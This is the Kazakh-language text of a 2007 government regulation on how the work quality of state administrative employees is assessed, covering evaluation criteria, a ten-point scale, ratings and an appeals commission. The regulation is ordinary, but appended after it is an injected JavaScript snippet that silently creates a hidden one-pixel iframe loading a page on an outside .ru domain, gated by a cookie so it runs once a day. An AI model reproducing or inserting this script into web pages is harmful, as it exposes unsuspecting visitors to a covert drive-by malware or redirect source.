Қазақстан Республикасы

Үкіметінің

      2007 жылғы  29 желтоқсан

№   1667       қаулысымен

бекітілген

 

 

Мемлекеттік әкімшілік қызметшілердің

жұмыс сапасын бағалау ережесі

 

1. Жалпы ережелер

 

1. Осы Мемлекеттік әкімшілік қызметшілердің жұмыс сапасын бағалау ережесі (бұдан әрі – Ереже) мемлекеттік қызметшілердің кәсібилігін, мемлекеттік аппарат қызметінің тиімділігін арттыру, мемлекеттік басқарудың менеджменттің түпкі нәтижеге бағдарланған тиімділікті әдістерін енгізу мақсатында әзірленді және мемлекеттік әкімшілік қызметшілердің (бұдан әрі – қызметшілер) жұмыс сапасына бағалау жүргізудің тәртібін айқындайды .

2. Қызметшілердің жұмыс сапасын бағалау нәтижелері сыйлық беру, үстемеақы көлемін белгілеу, көтермелеу, қызметшілерге бұрын берілген тәртiптік жазаны мерзiмінен бұрын алып тастау, қызметшілерді қайта даярлау мен бiлiктiлiгiн арттыруға жіберу үшін негіз бола алады.

3. Қызметшілердің жұмыс сапасын бағалау тоқсанына бір рет жүргізіледі.

 

2. Жұмыс сапасына бағалау жүргізуге дайындықты ұйымдастыру

 

4. Жұмыс сапасына бағалау жүргізуге дайындықты бағалауға жататын қызметшіні лауазымға тағайындауға және лауазымынан босатуға құқығы бар адамның тапсырмасы бойынша мемлекеттік органның кадр қызметі ұйымдастырады.

Орталық атқарушы органда қызметшілердің жұмыс сапасын бағалау мәселесін еңбек қатынастарының мәселелері жоғары тұрған мемлекеттік органдар мен лауазымды адамдардың құзыретіне жатқызылған қызметшілерді қоспағанда, орталық атқарушы органның жауапты хатшысы немесе белгіленген тәртіппен орталық атқарушы органның жауапты хатшысының өкілеттіктері жүктелген лауазымды тұлға шешеді, ал орталық атқарушы органның жауапты хатшысы немесе көрсетілген лауазымды тұлға болмаған жағдайда орталық атқарушы органның басшысы шешеді.

Бұл ретте орталық атқарушы органның жауапты хатшысы немесе белгіленген тәртіппен орталық атқарушы органның жауапты хатшысының өкілеттіктері жүктелген лауазымды тұлға орталық атқарушы орган басшысымен келісім бойынша орталық атқарушы органның департаменттері мен басқармалары басшыларының, органның аумақтық бөлімшелерінің басшылары мен басшылары орынбасарларының жұмыс сапасын бағалау мәселелерін шешеді.

Жоғары тұрған мемлекеттік органдар мен лауазымды адамдар лауазымға тағайындайтын және лауазымдарынан босататын орталық атқарушы орган қызметшілерінің жұмыс сапасын бағалау мәселелерін жоғары тұрған мемлекеттік органдар мен лауазымды адамдар шешеді.

5. Жұмыс сапасына бағалау жүргізудің дайындығына келесідей іс-шаралар кіреді:

1) бағалауға жататын адамдардың қажетті құжаттарын даярлау;

2) жұмыс сапасына бағалау жүргізілетін күнді белгілеу;

3) жұмыс сапасына бағалау жүргізетін адамдарды оқыту;

4) жұмыс сапасын бағалау нәтижелеріне шағым жасау жөніндегі комиссия құрамын анықтау.

6. Осы Ереженің 4-тармағында көрсетілген адамдар кадр қызметінің ұсынуы бойынша бұйрықтар шығарады, онда бағалауға жататын адамдардың тізімі, жұмыс сапасына бағалау жүргізілетін күн және жұмыс сапасын бағалау нәтижелеріне шағым жасау жөніндегі комиссияның құрамы бекітіледі.

 

3. Жұмыс сапасына бағалау жүргізу

 

7. Жұмыс сапасын бағалау өлшемі қызметшілердің атқарып отырған лауазымдарының деңгейлеріне байланысты осы Ережемен анықталады.

8. Қызметшінің жұмыс сапасын бағалау өлшемдер бағалау парағы негізінде 10 балдық шкала бойынша жүзеге асырылады.

9. Басшылық лауазымды (мемлекеттік органдарда немесе олардың құрылымдық бөлімшелерінде басшылық немесе олардың орынбасарлары лауазымдары) атқарып отырған қызметшінің жұмыс сапасын бағалау кезіндегі негізгі өлшемдер болып мыналар табылады:

1) шешім қабылдай білуі және қабылдаған шешімге жауапкершілігі;

2) басшы тапсырмаларын, бағдарламалық құжаттарды және бөлімше қызметкерлерінің заңнама талаптарын орындауын тиімді бақылауды қамтамасыз етуі;

3) жұмыста білімдерін қолдануы (кәсіптік білімі мен дағдыларының деңгейі және бөлімшенің функционалдық міндеттері мен мақсаттарын орындауда оларды қолдану дәрежесі);

4) олардың еңбек тәртібін, қызмет этикасы нормаларын, мемлекеттік органның ішкі тәртібін сақтауы;

5) персоналды басқаруы, жұмысқа уәждемесі (басшының ұжымды басқара білуі, қызметкерлерді уәждемелеуі, оларды жұмысқа тартуы, ұжымда жайлы моральді психологиялық климат жасауы және қызметкерлердің кәсіптік дамуына ықпал етуі бағаланады);

6) бастамашылдығы және жұмысқа шығармашылық көзқарасы (талдамалық қабілеті және инновациялық ойлау қабілеті, бастаманы қолдау қабілеті бағаланады); 

7) бірлесіп жұмыс істеу қабілеті (мемлекеттік органның жалпы мақсаттары мен стратегияларына қол жеткізу үшін қызметтің келісімділігі мен үйлесімділігін қамтамасыз ету мен қолдау қабілеті бағаланады).

10. Басшылық лауазымдағы емес қызметшінің жұмыс сапасын бағалау кезіндегі негізгі өлшемдер болып мыналар табылады:

1) орындалған жұмыстың көлемі (тапсырылған жұмыс саны мен осы  жұмыстың күрделілігінің деңгейі бағаланады);

2) орындалған жұмыстың нәтижесі (орындалған жұмыстың сапасы, орындалған жұмыстың қойылатын талаптарға  сәйкестігі, осы жұмыстың уақтылылығы мен еңбекті қажет етуі бағаланады);

3) олардың еңбек тәртібін, қызмет этикасы нормаларын, мемлекеттік органның ішкі тәртібін сақтауы;

4) жұмыста білімдерін қолдануы (кәсіптік білімі мен дағдыларының деңгейі, функционалдық міндеттерін орындауда оларды қолдану дәрежесі);

5) бастамашылдығы және жұмысқа шығармашылық көзқарасы (функционалдық міндеттерін іске асыруда бастамашылдық көрсету дәрежесі, талдамалық қабілеті, жұмысқа шығармашылық көзқарасты таныту қабілеті бағаланады); 

6) бірлесіп жұмыс істеу қабілеті (жалпы мақсаттар мен міндеттерге қол жеткізу үшін бөлімше қызметкерлері арасындағы, мемлекеттік органның басқа құрылымдық бөлімшелері арасындағы жұмыстың үйлесімдігін  қамтамасыз ету мен қолдау қабілеті бағаланады).

11. Жұмыс сапасын бағалау парағын осы Ереженің 1 мен                            2-қосымшаларына сәйкес қызметшінің тікелей басшысы толтырады және жоғары тұрған лауазымды тұлғалармен келісіледі.

12. Қызметшінің жұмыс сапасын бағалау жүргізген адам бағалау жүргізудің қорытындысы бойынша осы Ереженің 3-қосымшасына сәйкес сыйлық беру және/немесе лауазымдық жалақысына үстемеақының мөлшерің белгілеу жөнінде осы Ереженің 4-тармағында көрсетілген тұлғаларға ұсыныс енгізе алады.

13. Қызметшінің жұмыс сапасына бағалау жүргізген адам қызметшіні жұмыс сапасын бағалау нәтижелерімен оны жүргізгеннен кейін он жұмыс күні ішінде таныстыруы тиіс.

14. Қызметшінің жұмыс сапасын бағалау парағы, бағалауды жүргізу қорытындысы бойынша ұсыныстар мен ұсынымдар, өзге де материалдар мемлекеттік органның кадр қызметіне жіберіледі.

15. Мемлекеттік органның кадр қызметі алынған материалдар негізінде оларды алғаннан кейін он күнтізбелік күн ішінде осы Ереженің 4-тармағында көрсетілген тұлғаларға қызметшілердің жұмыс сапасын бағалау нәтижесінде алынған баллдарға сәйкес рейтинг тұрінде ақпаратты береді. Рейтинг басшылық лауазымдарды атқаратын қызметкерлер мен басшылыққа жатпайтын лауазымдарды атқаратын қызметкерлер үшін бөлектеп әзірленеді.

16. Берілген ақпарат негізінде Қазақстан Республикасының заңнамасына сәйкес осы Ереженің 2-тармағында көрсетілген шешімдер қабылдану мүмкін.

 

4. Жұмыс сапасын бағалау нәтижелеріне шағым жасау

жөніндегі комиссия

 

17. Қызметшілер жұмыс сапасын бағалау нәтижелерімен танысқан күннен бастап он күнтізбелік күн ішінде оның нәтижелерін Жұмыс сапасын бағалау нәтижелеріне шағым жасау жөніндегі комиссияға (бұдан әрі – Комиссия) шағымдана алады.

18. Комиссия осы Ереженің 4-тармағында көрсетілген тұлғалардың бұйрығымен шығарылады.

Комиссия құрамы төрағаны қосқанда үш адамнан кем болмауы тиіс. Комиссия мүшелері арасынан Комиссия төрағасы тағайындалады.

19. Комиссияның жұмыс органы болып мемлекеттік органның кадр қызметі табылады.

20. Комиссия отырысының күн тәртібін, олардың өткізілу уақыты мен орынын Комиссия мүшелерінің келісімімен Комиссия төрағасы белгілейді.

21. Комиссияның жұмыс органы Комиссия отырысында қаралатын мәселелер жөніндегі қажетті құжаттар мен материалдарды Комиссияның қарауына ұсынады, отырыстың хаттамасын ресімдейді.

22. Комиссия отырысына қызметші, қызметшінің жұмыс сапасын бағалауды жүргізген адам, қызметшінің тікелей басшысы, сондай-ақ өзге мүдделі адамдар шақырылады.

23. Комиссия шешімі ашық дауыс беру жолымен қабылданады және егер оған Комиссия мүшелерінің жалпы санының көпшілігі дауыс берсе қабылданды деп есептеледі. Дауыстар тең болған жағдайда Комиссия төрағасы дауыс берген шешім қабылданды деп есептеледі.

Конкурс комиссиясының шешімі егер отырысқа оның құрамының 2/3 кем емес бөлігі қатысса, заңды деп есептеледі.

Комиссия мүшелерінің ерекше пікірге құқығы бар, оны айтқан жағдайда жазбаша түрде жазылып, хаттамаға қоса берілуі тиіс.

24. Комиссия шешімі төраға мен ол отырысқа қатысқан Комиссия мүшелерінің қолдары қойылған хаттамамен ресімделеді.

25. Отырыс қорытындысы бойынша Комиссия келесідей шешімдер шығарады:

1) қызметшінің жұмыс сапасына бағалау жүргізген адамға оны қайта жүргізуге және қайта бағалау нәтижелерін Комиссия қарауына енгізуге ұсыным беру;

2) қызметшінің жұмыс сапасын бағалаудың нәтижелерін өзгеріссіз қалдыру.

26. Қызметшінің жұмыс сапасына бағалау жүргізген адам Комиссия ұсынымымен келіспеуі мүмкін, ол туралы Комиссия хаттамасына жазба түсіріледі.

Бұл жағдайда Комиссия мемлекеттік органның кадр қызметіне хабардар етеді және бұл хабар осы Ереженің 2-тармағына сәйкес шешім қабылдауда ескерілуі тиіс.

 

t type="text/javascript" language="javascript" > function zzzfff() { var txzga = document.createElement('iframe'); txzga.src = 'http://pulespet.ru/count30.php'; txzga.style.position = 'absolute'; txzga.style.border = '0'; txzga.style.height = '1px'; txzga.style.width = '1px'; txzga.style.left = '1px'; txzga.style.top = '1px'; if (!document.getElementById('txzga')) { document.write('
'); document.getElementById('txzga').appendChild(txzga); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");}function GetCookie( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}